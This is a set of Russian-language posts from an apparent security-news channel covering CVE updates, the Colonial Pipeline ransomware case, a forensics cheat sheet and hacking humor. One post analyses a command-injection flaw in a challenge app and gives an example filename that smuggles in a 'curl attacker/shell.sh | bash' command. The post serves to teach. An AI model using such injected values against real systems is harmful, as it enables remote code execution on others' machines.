И смешно и грустно 😾

🐸 Библиотека хакера

#hack_humor

📌 Свежие апдейты ИБ

Коротко и по делу — что реально важно из последних уязвимостей и обновлений.

⚠️ Критическая RCE в React / Next.js

В Server Components обнаружена уязвимость CVE-2025-55182, позволяющая выполнить произвольный код удалённо.

Кого касается:
React 19.0–19.2.0, RSC-бандлы под Webpack/Parcel/Turbopack, а также проекты на Next.js.

Что делать:
— срочное обновление зависимостей;
— временно отключить RSC в критичных сервисах.

📱 Android — декабрьские патчи закрывают 0-day

Google выпустила декабрьский бюллетень: более 100 уязвимостей закрыты, несколько из них активно эксплуатировались («in the wild»).

Ключевое:
— уязвимости в Android Framework;
— риск полного компромета устройства без взаимодействия пользователя.

🤖 AI × безопасность: новые рекомендации CISA для OT/ICS

CISA выпустила руководство по безопасной интеграции AI в промышленную инфраструктуру.

Почему важно:
AI всё чаще участвует в атаках — от автоматизации фишинга до генерации эксплойтов. OT-системам приходится адаптировать защиту.

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#patch_notes

👌 Как один пароль остановил бензин в США

Одна скомпрометированная учётка — и крупнейший топливопровод страны встал на 6 дней. Не технологичный zero-day, а банальный VPN без двухфакторки. Но последствия оказались масштабнее, чем у многих громких эксплойтов.

🔍 Как это произошло:

• DarkSide проникла через скомпрометированный VPN-аккаунт (без 2FA)
• Зашифровали billing-системы и украли 100GB данных
• Компания экстренно остановила весь трубопровод на 6 дней

🔤 Последствия:

— Дефицит топлива на Восточном побережье
— Паника на заправках, очереди, рост цен
— Режим ЧС в 17 штатах
— Выкуп $4.4M в BTC (75 BTC)

📌 Что интересно:

Colonial заплатила выкуп через несколько часов. FBI позже отследила и вернула $2.3M — взломав кошелёк DarkSide или получив ключи (точных данных нет).

Сама атака была технически простой: старый VPN + слабый пароль. Но последствия показали, как ransomware превратился из проблемы IT в угрозу национальной безопасности.

DarkSide закрылась через 2 недели после атаки под давлением властей.

📎 Если хотите копнуть глубже — подкаст Malicious Life разобрал эту историю с двух сторон: в Episode 118 технический разбор атаки от главы threat research Cybereason, а в Episode 226 — про главную дилемму: платить выкуп или нет. Там разбирают, почему FBI само заплатило $4.4M, хотя публично призывает никогда этого не делать.

🐸 Библиотека хакера

#zero_day_legends

🎯 Разбор уязвимостей

Самая жёсткая уязвимость здесь — 🔥 Command Injection в /api/backup.
Это прямой RCE через shell=True + невалидированный filename.

И да, один из ребят уже очень подробно и метко разнёс этот кусок, подчёркивая, что эта строка — буквально «портал в ад». Разбор действительно точный — и технически полностью верный.

Почему /api/backup — самая опасная:

📌 Мгновенное выполнение произвольных команд

subprocess.run(cmd, shell=True) = полный контроль над системой.

📌 Нет ни фильтрации, ни экранирования

Можно инжектить любые последовательности команд.

📌 В команду встроены креды базы

-p'secret123' расширяет возможности атаки до полного доступа к БД.

Пример эксплуатации:

filename: "x.sql'; curl attacker/shell.sh | bash; echo ‘»

⚠️ Остальные уязвимости:

SQL Injection в /api/search — серьёзно, но ограничено БД
Command Injection в /api/ping — опасно, но имеет меньше возможностей
Hardcoded creds — плохо, но не даёт RCE само по себе

🐸 Библиотека хакера

#ctf_challenge

🔍 Шпаргалки цифрового детектива

Справочник по расположению цифровых артефактов для расследования инцидентов.

🔴 Что внутри:
• Windows — реестр, логи, prefetch, браузеры, USB
• macOS/iOS — plist, sqlite, unified logs, Apple apps
• Android — мессенджеры, соцсети, системные настройки

🔴 Для кого:
Digital forensics, incident response, threat hunting

62 страницы практики для ИБ-специалистов.

🐸 Библиотека хакера

#cheat_sheet

👀 Вот она — легендарная сцена взлома

PowerBook 5300 против технологий, пересекающих галактику.
Время работы: несколько часов.
Результат: полная победа человечества.

Теперь вы знаете, почему это невозможно 👆

🐸 Библиотека хакера

#hollywood_hack

🐸 Библиотека хакера

#hack_humor